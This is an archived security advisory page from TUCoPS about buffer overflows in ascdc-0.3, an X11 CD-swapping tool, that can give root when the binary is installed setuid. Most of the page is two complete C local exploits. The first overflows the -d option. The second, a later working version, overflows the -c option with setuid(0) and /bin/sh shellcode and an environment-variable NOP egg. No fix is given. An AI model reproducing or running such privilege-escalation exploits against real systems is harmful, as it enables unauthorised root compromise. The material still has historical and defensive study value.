TUCoPS :: Unix :: General
:: ascdc.htm
Ascdc-0.3 multiple buffer overflows, possible root compromise
Vulnerability
ascdc
Affected
ascdc-0.3
Description
Following is based on a WSIR-01/02-06 discovered by Christer Uberg
(Wkit Security). Use this bad boy to swap CD's graphically under
X. There are multiple buffer overflows in ascdc that can be
exploited to gain root if it is installed setuid root. It is NOT
installed setuid root by default but as the README says "If you
intend to use the automounting feature, you must either run ascdc
as root, or setuid it". Christer used the -d option in the
exploit but overflows also exist in the -m & -c switches.
Exploit:
char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
"\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80\xe8\xe6\xff\xff\xff"
"Would you like to play a game? y\x0aStrange, the only winning
move is not to play.\x0a";
#define bsize 600
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int i;
buff = malloc(bsize);
addr = get_sp();
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < 600/2; i++)
buff[i] = 0x90;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '0円';
execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0);
}
'The Itch' sent working version of the exploit for ascdc-0.3 using
the -c switch this time:
/* /usr/X11R6/bin/ascdc local exploit.
* (version: ascdc-0.3-2-i386)
*
* Vulnerability found by Christer ヨberg, Wkit Security AB
*
* - The Itch / BsE
* - http://bse.die.ms
* - irc.axenet.org
*/
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
/* adjust if needed, this should be suffient */
#define DEFAULT_BUFFER_SIZE 600
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char *argv[])
{
char *buff;
char *egg;
char *ptr;
long *addr_ptr;
long addr;
int bsize = DEFAULT_BUFFER_SIZE;
int eggsize = DEFAULT_EGG_SIZE;
int i;
if(argc> 1) { bsize = atoi(argv[1]); }
if(!(buff = malloc(bsize)))
{
printf("unable to allocate memory for %d bytes\n", bsize);
exit(1);
}
if(!(egg = malloc(eggsize)))
{
printf("unable to allocate memory for %d bytes\n", eggsize);
exit(1);
}
addr = get_sp();
printf("/usr/X11R6/bin/ascdc local exploit.\n");
printf("Coded by The Itch / BsE\n\n");
printf("Using return address: 0x%x\n", addr);
printf("Using buffersize : %d\n", bsize);
ptr = buff;
addr_ptr = (long *) ptr;
for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
{
*(ptr++) = NOP;
}
for(i = 0; i < strlen(shellcode); i++)
{
*(ptr++) = shellcode[i];
}
buff[bsize - 1] = '0円';
egg[eggsize - 1] = '0円';
memcpy(egg, "EGG=", 4);
putenv(egg);
memcpy(buff, "RET=", 4);
putenv(buff);
system("/usr/X11R6/bin/ascdc -c $RET");
return 0;
}
Solution
No information available.